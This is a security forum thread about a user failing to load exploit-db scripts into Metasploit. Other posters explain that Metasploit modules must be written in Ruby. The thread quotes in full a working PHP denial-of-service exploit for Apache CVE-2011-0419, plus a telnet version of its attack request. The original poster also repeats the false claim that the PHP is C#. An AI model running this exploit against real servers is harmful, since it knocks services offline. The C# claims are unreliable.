Jump to content

I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit


TheRoyalSloan

Recommended Posts

I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link:https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after i reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and i just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possible think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit??

Link to comment
Share on other sites

are the exploits you downloaded written in metasploit coded modules, or another scripting language? Post your code.

Try looking at the Metasploit Unleashed section for some examples - https://www.offensive-security.com/metasploit-unleashed/shell/

Link to comment
Share on other sites

Absolutely, here is a .php file from an exploit I downloaded from exploit-db.com that is labled Apache 1.4-2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability:

source: http://www.securityfocus.com/bid/47820/info

Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.

Apache APR versions prior to 1.4.4 are vulnerable.

<?php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
author: Maksymilian Arciemowicz

CVE: CVE-2011-0419
CWE: CWE-399

REMOTE
Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.

http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]

LOCAL
Tested on:
127# httpd -v && uname -a
Server version: Apache/2.2.17 (Unix)
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386

Result:
127# ls -la
total 8
drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
127# ps -aux -p 617
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start

Time = 121:43 and counting

where http://[$localhost]:[$localport]/[$localuri]
*/
$localhost="localhost";
$localport=80;
$localuri="/koniec/";


if(!is_writable(".")) die("!writable");

// Phase 1
// Create some filename
touch("cx".str_repeat(".",125));

// Phase 2
// Create .htaccess with
unlink("./.htaccess");
$htaccess=fopen("./.htaccess", "a");
fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n");
fclose($htaccess);

// Phase 3
// Local connect (bypass firewall restriction)
while(1){
$fp = fsockopen($localhost, $localport, $errno, $errstr, 30);
if (!$fp) echo "$errstr ($errno)<br />\n";
else {
$out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n";
$out .= "Host: ".$localhost."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fclose($fp);
}
}

?>

You can tell that the exploit is written in C# by how the flow control mechanism is defined at the end by "$out .= "Connection: Close\r\n\r\n""

Link to comment
Share on other sites

Which of course rules the theory of coding issues out. If coding issues were the problem here the msfconsole would issue the "Failed to install module." response rather than "Failed to load module" when the exploit is called upon by the user in the msfconsole for use or when the module reload command is issued by the user the "Failed to install module" would also be given as a response if the coding issues were a problem for the exploit.

Link to comment
Share on other sites

It's a PHP file. SAve as file.php, upload to a site, and run, it's PHP, not a metasploit module. you can tell by the code at the top of the file:

​

<?php
Link to comment
Share on other sites

I exceeded the number of posts I was able to submit on my original account so I had to create this new account to respond to your post. Modules can be saved as .txt, .php, .rb, and .py. You can see for yourself in the preloaded modules that come with Metasploit in the /usr/share/metasploit-framework/modules/exploits/... And this script seems to use C# send a request to PHP scripts running at the webserver and make PHP return data to C# application running on the desktop through internet.

Link to comment
Share on other sites

and to be more precise this script is for a denial of service attack which you can read more about at https://en.wikipedia.org/wiki/Denial-of-service_attack#Internet_Control_Message_Protocol_.28ICMP.29_flood. I say it is in C# because the author used C functions such as fclose ( https://en.wikibooks.org/wiki/C_Programming/C_Reference/stdio.h/fclose ) to inject the PHP scripts for this C application just as I vaguely said above. But what is important is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution as it is causing me much distress.

Link to comment
Share on other sites

It's a php file as

/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
author: Maksymilian Arciemowicz
 
CVE: CVE-2011-0419
CWE: CWE-399
 
REMOTE
Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.
 
http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]
 
LOCAL
Tested on:
127# httpd -v && uname -a  
Server version: Apache/2.2.17 (Unix)
Server built:   Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov  7 14:39:56 UTC 2010  builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
 
Result:
127# ls -la    
total 8
drwxrwxrwx  2 root  wheel   512 Feb  8 21:41 .
drwxr-xr-x  7 www   wheel  1024 Jan 31 08:49 ..
-rw-r--r--  1 www   wheel  1056 Feb  8 19:39 .htaccess
-rw-r--r--  1 www   wheel     0 Feb  8 19:39 cx.............................................................................................................................
-rw-r--r--  1 www   wheel  1240 Feb  8 19:42 run.php
127# ps -aux -p 617  
USER PID %CPU %MEM   VSZ  RSS TTY STAT STARTED      TIME COMMAND
www  617 98.6  0.4 10028 4004 ?   R     7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start  
 
Time = 121:43 and counting
 
where http://[$localhost]:[$localport]/[$localuri]
*/

is a comment about its use/result

Edited by deadlyhabit
Link to comment
Share on other sites

It's at the very least difficult (and I'd currently even say impossible but I'm still learning wrt C#) to create any C# program that:

- doesn't contain the word 'class'

- doesn't define a method/function

- doesn't import anything

Also, C# doesn't use the dot for string concatenation, which is what that snippet which you quote as evidence does. In C# that would've read += and in fact as far as I can tell PHP is the ONLY language to use a dot for string concatenation (a requirement from being loosely typed. If they used + what would 'echo 1 + 2' produce, 3 or 12?).

Link to comment
Share on other sites

it has no includes so not any c derivative, it's php at best (c/c++ nerd here) if not c derivative it's python (learning now) or ruby (no desire to learn)

it's a basic logic chain that anyone coding can follow, but since i never fucked with php and thats the header... bingo.

oh and from fucking around in unity c# would have some includes unless this is just a lazy exploit, which it doesn't seem to be, just run on dated shit.

Edited by deadlyhabit
Link to comment
Share on other sites

The above file posted, is strictly PHP. Anything in /* comment*/ is just that, a comment.fopen and fclose are part of the normal php codebase, and not exclusive to languages like c#.

Some php.net reference for the op:

http://php.net/manual/en/function.fopen.php

http://php.net/manual/en/function.fclose.php

Periods are continuation of code inline, like :

$variable = $_POST['some_form_value'];

echo "this is text in quotes and the following value: " . $variable . " is echoed back in the page";

[code]

poor example since this could be used wrapped directly in the quotes, but just an example of the concept.

If the php file is a payaload to be uploaded after exploitation and then run on the target machine, that would make more sense, but by itself, does not make a metasploit module. Metasploit modules are written in ruby and look like so:

https://www.exploit-db.com/exploits/16581/

If you were to take the PHP file and port it over, you'd look for an msf module that uses http get requests and substitute the code.

Searching the CVE I see one exploit: https://www.exploit-db.com/search/?action=search&cve=CVE-2011-0419&e_author=

which if you click the source file link, spits out the PHP file, hence, php, not a metapsloit module, unlike the link I posted above, for 16581, which spits out an actual ruby .rb file.

Link to comment
Share on other sites

It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.

Link to comment
Share on other sites

It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.

https://www.offensive-security.com/metasploit-unleashed/porting-exploits/

by the way, files in /usr/share/metapsloit-framework/modules/exploits/####> are ruby files ending in .rb, not php. Even files in ..../modules/payloads/php are ruby files. Take a look at one of the php payloads. The thing I see above is, this requires a place to drop the file on the server and be run on the server(or i might be reading the exploit wrong). So to me, this would be like a post exploitation attack on the server after you get access to then drop it on the server. Looking at the php code, this attack happens on the localhost(I asume as a demonstration), even though the description states it's a remote exploit, this appears it's a POC as a local exploit. If you modified a GET request for an external site, and it was vulnerable, my guess is it causes apache to freeze and eventually DoS after it eats up resources. you could probably pull the same attack, with telnet, although not sure if the htaccess file and other stored file on the server are required in the full attack, the GET request would look like:





telnet vulnsite.com 80
GET /pathrequired/?P=*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*? HTTP/1.1
HOST: vulnsite.com
Connection: Close


.

Looking more at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419 and some of the exmaples, the files created on the server are also required. Can see another example here: http://cxsecurity.com/issue/WLB-2011050133

Edited by digip
Link to comment
Share on other sites

It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.

According to the comments the guy who wrote that code tested it on NetBSD. Please, oh genius with knowledge beyond his years, pray tell where the C# runtime comes in to execute it? Are you trying to argue the target is using mono?

Link to comment
Share on other sites

According to the comments the guy who wrote that code tested it on NetBSD. Please, oh genius with knowledge beyond his years, pray tell where the C# runtime comes in to execute it? Are you trying to argue the target is using mono?

Unless he's got something other than what he posted that he is referring to, he may just be confused by the syntax of the php script which to the point is just a delivery method to do the attack which can be done may other ways looking at the code more now, you need to create the htaccess file with the proper code, as well as create the cx... file with the long string of periods, and then on an apache server running vulnerable apr_fnmatch request the file via a GET request which in this case is done using PHP, which could be delivered a multitude of ways.
Link to comment
Share on other sites

And to your question of why it is failing in Metasploit, it is because Metasploit expects its exploits to be built as Metasploit modiles in Ruby, not php scripts which are designed to be ran on the command line.

You can't just take something you randomly found on exploitdb and expect it to run in Metasploit.

Link to comment
Share on other sites

I'll have one more go at explaining this and try to answer some of the points you put in the report (I'm a moderator, I see the reports).

MSF loads modules which are written in Ruby, it doesn't load random scripts, that is why you are getting the load error. If you want to add a new exploit you need to find one that is written as a MSF module and include that.

Cooper did not say you can't execute C files on NetBSD (technically you can't, you run binaries which are compiled from C) he said that the script you are talkign about was tested on NetBSD

And as you seem to doubt my credentials for being able to answer this question, there are a handful of modules I wrote in the main MSF trunk. You could also try taking your question to the Metasploit mailing list or IRC channel if you don't like the answers you are getting here.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...